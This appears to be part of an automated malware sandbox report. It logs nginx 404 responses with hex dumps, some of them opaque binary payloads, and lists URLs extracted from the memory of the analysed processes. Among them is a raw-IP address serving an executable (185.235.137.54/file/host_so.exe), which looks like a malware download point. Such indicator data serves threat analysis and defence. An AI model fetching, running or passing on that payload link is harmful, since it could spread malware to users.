Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 22:27:18 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 22:27:19 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 22:27:20 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 2d 5e 24 17 a6 61 44 a2 ae 09 ab c8 ad ac 2b 98 2b 9a ed 33 5e 14 98 8f c1 cb 7c d1 Data Ascii: #\-^$aD++3^|
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 22:27:22 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 22:27:25 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 22:27:26 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 22:27:27 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 2b 58 24 17 a0 6d 44 af a8 09 a2 cc b6 e5 32 9d 20 c1 e0 2a 0b 19 9a c4 8a d6 61 Data Ascii: #\+X$mD2 *a
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 22:27:50 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 22:27:51 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 20 5a 24 14 a4 6a 44 a9 ab 14 bd cc b1 fb 6d 87 2a d3 ab 77 5f 07 98 d9 8a da 63 c6 2a 1d 01 8b 0a 8c 5e 6e 55 53 b5 91 73 f2 73 ed 44 19 13 Data Ascii: #\ Z$jDm*w_c*^nUSssD
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 22:27:55 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 22:29:07 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 22:29:14 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 22:29:20 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 22:29:28 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 22:29:34 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 22:29:40 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 22:29:48 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 22:29:53 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 22:29:59 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 22:30:06 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 22:30:12 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 22:30:17 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 22:30:24 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 22:30:29 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 22:30:35 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 22:30:42 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 22:30:48 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 22:30:48 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 22:30:57 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: katA304.tmp, 0000000D.00000003.2654301050.00000000009B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://127.0.0.1:27060
Source: 21AE.exe, 00000005.00000003.2493723508.000000000088F000.00000004.00000020.00020000.00000000.sdmp, 21AE.exe, 00000005.00000002.2691748524.0000000000892000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.235.137.54/file/host_so.exe
Source: nss3[1].dll.13.dr, mozglue.dll.13.dr, softokn3[1].dll.13.dr, freebl3.dll.13.dr, mozglue[1].dll.13.dr, softokn3.dll.13.dr, freebl3[1].dll.13.dr, nss3.dll.13.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: nss3[1].dll.13.dr, mozglue.dll.13.dr, softokn3[1].dll.13.dr, freebl3.dll.13.dr, mozglue[1].dll.13.dr, softokn3.dll.13.dr, freebl3[1].dll.13.dr, nss3.dll.13.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: 21AE.exe, 00000005.00000003.2384311216.0000000002C93000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: 21AE.exe, 00000005.00000003.2384311216.0000000002C93000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: explorer.exe, 00000002.00000000.2040029267.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2040029267.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: katA304.tmp, 0000000D.00000003.2954487712.0000000000A36000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2866492017.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2954487712.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2986553646.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2986940209.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.13.dr, mozglue.dll.13.dr, softokn3[1].dll.13.dr, freebl3.dll.13.dr, mozglue[1].dll.13.dr, softokn3.dll.13.dr, freebl3[1].dll.13.dr, nss3.dll.13.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: katA304.tmp, 0000000D.00000003.2954598734.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2858305689.0000000000A4E000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.13.dr, mozglue.dll.13.dr, softokn3[1].dll.13.dr, freebl3.dll.13.dr, mozglue[1].dll.13.dr, softokn3.dll.13.dr, freebl3[1].dll.13.dr, nss3.dll.13.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: katA304.tmp, 0000000D.00000003.2866492017.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2954487712.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2986553646.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2954598734.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2986940209.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.13.dr, mozglue.dll.13.dr, softokn3[1].dll.13.dr, freebl3.dll.13.dr, mozglue[1].dll.13.dr, softokn3.dll.13.dr, freebl3[1].dll.13.dr, nss3.dll.13.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: 21AE.exe, 00000005.00000003.2384311216.0000000002C93000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: explorer.exe, 00000002.00000000.2036595437.0000000000F13000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.v
Source: nss3[1].dll.13.dr, mozglue.dll.13.dr, softokn3[1].dll.13.dr, freebl3.dll.13.dr, mozglue[1].dll.13.dr, softokn3.dll.13.dr, freebl3[1].dll.13.dr, nss3.dll.13.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: nss3[1].dll.13.dr, mozglue.dll.13.dr, softokn3[1].dll.13.dr, freebl3.dll.13.dr, mozglue[1].dll.13.dr, softokn3.dll.13.dr, freebl3[1].dll.13.dr, nss3.dll.13.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: 21AE.exe, 00000005.00000003.2384311216.0000000002C93000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: 21AE.exe, 00000005.00000003.2384311216.0000000002C93000.00000004.00000800.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2954487712.0000000000A36000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2858305689.0000000000A4E000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.13.dr, mozglue.dll.13.dr, softokn3[1].dll.13.dr, freebl3.dll.13.dr, mozglue[1].dll.13.dr, softokn3.dll.13.dr, freebl3[1].dll.13.dr, nss3.dll.13.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: explorer.exe, 00000002.00000000.2040029267.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2040029267.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: katA304.tmp, 0000000D.00000003.2954598734.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2858305689.0000000000A4E000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.13.dr, mozglue.dll.13.dr, softokn3[1].dll.13.dr, freebl3.dll.13.dr, mozglue[1].dll.13.dr, softokn3.dll.13.dr, freebl3[1].dll.13.dr, nss3.dll.13.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: katA304.tmp, 0000000D.00000003.2866492017.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2954487712.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2986553646.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2954598734.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2986940209.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.13.dr, mozglue.dll.13.dr, softokn3[1].dll.13.dr, freebl3.dll.13.dr, mozglue[1].dll.13.dr, softokn3.dll.13.dr, freebl3[1].dll.13.dr, nss3.dll.13.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: katA304.tmp, 0000000D.00000003.2954487712.0000000000A36000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2866492017.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.13.dr, mozglue.dll.13.dr, softokn3[1].dll.13.dr, freebl3.dll.13.dr, mozglue[1].dll.13.dr, softokn3.dll.13.dr, freebl3[1].dll.13.dr, nss3.dll.13.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: nss3[1].dll.13.dr, mozglue.dll.13.dr, softokn3[1].dll.13.dr, freebl3.dll.13.dr, mozglue[1].dll.13.dr, softokn3.dll.13.dr, freebl3[1].dll.13.dr, nss3.dll.13.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: 21AE.exe, 00000005.00000003.2384311216.0000000002C93000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: katA304.tmp, 0000000D.00000003.2954487712.0000000000A36000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2858305689.0000000000A4E000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.13.dr, mozglue.dll.13.dr, softokn3[1].dll.13.dr, freebl3.dll.13.dr, mozglue[1].dll.13.dr, softokn3.dll.13.dr, freebl3[1].dll.13.dr, nss3.dll.13.dr String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: explorer.exe, 00000002.00000000.2040029267.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2040029267.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
